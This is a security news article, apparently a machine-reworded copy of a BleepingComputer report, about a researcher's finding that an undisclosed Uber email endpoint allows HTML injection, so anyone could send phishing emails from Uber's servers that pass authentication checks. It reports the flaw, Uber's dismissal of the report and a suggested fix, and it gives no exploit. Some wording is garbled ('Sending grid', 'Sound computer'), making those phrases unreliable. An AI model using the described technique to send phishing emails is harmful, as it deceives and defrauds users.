Uber dismisses vulnerability that allows you to email anyone as Uber!

uber

A vulnerability in Uber’s email system allows anyone to send email on behalf of Uber.

The researcher who discovered the flaw warns that this vulnerability can be exploited by malicious actors to send email to 57 million Uber users and drivers whose information was leaked during the 2016 data breach.

Uber appears to be aware of the flaw but has not fixed it yet.

“Your Uber is coming now”

Security researcher and bug hunter Seif Elsallamy discovered a loophole in Uber’s systems that allows anyone to send emails on behalf of Uber.

These emails, sent from Uber’s servers, would appear legitimate to an email provider (because technically they are) and pass all spam filters.

Imagine receiving a message from Uber saying, “Your Uber is coming now” or “Your Thursday morning trip with Uber”, when you have never taken those trips.

During a demo, Elsallamy sent me the following email which, without a doubt, appeared to be from Uber and landed straight to my inbox, no spam:

PoC email sent from Uber's servers
PoC email sent to BleepingComputer from Uber’s servers

The electronic form sent to BleepingComputer by the researcher urges the Uber customer to provide their credit card information.

Note, however, that the message had a clear disclaimer at the bottom stating “this is a proof of concept security vulnerability” and was sent to BleepingComputer with pre-authorization.

Disclaimer
PoC disclaimer in email sent to BleepingComputer by Uber

On New Years Eve 2021, the researcher responsibly reported the vulnerability to Uber through its HackerOne bug bounty program.

However, his report was dismissed for being “out of reach” on the mistaken assumption that exploiting the technical loophole itself required some form of social engineering:

Uber rejects researcher report
Uber dismisses researcher report concluding it requires social engineering (Twitter)

57 million Uber customers and drivers at risk

Contrary to what one might think, this is not a simple case of email spoofing used by threat actors to create phishing emails.

Indeed, the email sent by the researcher “from Uber” to BleepingComputer is passed at the same time DKIM and DMARC security checks, according to the email headers we’ve seen.

Emails sent from Uber pass DKIM and SPF security checks
Email sent “from Uber” passes DKIM and DMARC security checks (Sound computer)

The researcher’s email was sent via Sending grid, an email marketing and customer communication platform used by leading companies.

But, Elsallamy tells BleepingComputer that this is an endpoint exposed on Uber’s servers responsible for the flaw and allows anyone to create an email on behalf of Uber.

The vulnerability is “an HTML injection into one of Uber’s email endpoints,” Elsallamy explains, comparing it to a similar flaw discovered in 2019 on Meta (Facebook) servers by pen-tester Youssef Sammouda.

In the case of Meta, the endpoint looked the same as:

https://legal.tapprd.thefacebook.com/tapprd/Portal/ShowWorkFlow/AnonymousEmbed/XXXXXXXXXXXXX

Naturally, for security reasons, the researcher did not disclose the vulnerable Uber endpoint.

He interrogates Uber, “Bring your [calculator] and tell me what would be the result if this vulnerability had been used with the 57 million emails [addresses that leaked] of the last data breach? “

“If you know the outcome, tell your employees on the Bug Bounty Triage Team.”

Elsallamy refers to the Uber data breach in 2016 that exposed the personal information of 57 million Uber customers and drivers.

For this incident, the UK Information Commissioner’s Office (ICO) fined Uber £ 385,000, as well as the Netherlands Data Protection Authority (Autoriteit Persoonsgegevens) who fined Uber a fine of € 600,000 to the company.

By exploiting this unpatched vulnerability, adversaries can potentially send targeted phishing scams to millions of Uber users previously affected by the breach.

When asked what Uber could do to correct the flaw, the researcher replied:

“They should clean up user input in a vulnerable, undisclosed form. Since the HTML code is rendered, they can use a security encoding library to perform HTML entity encoding so that any HTML code appears as text, “Elsallamy told BleepingComputer.

BleepingComputer contacted Uber well in advance of the post, but has not had a response yet.

Uber users, staff, drivers and associates should beware of phishing emails sent by Uber that appear legitimate, as exploitation of this flaw by malicious actors remains a possibility.

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Trending this Week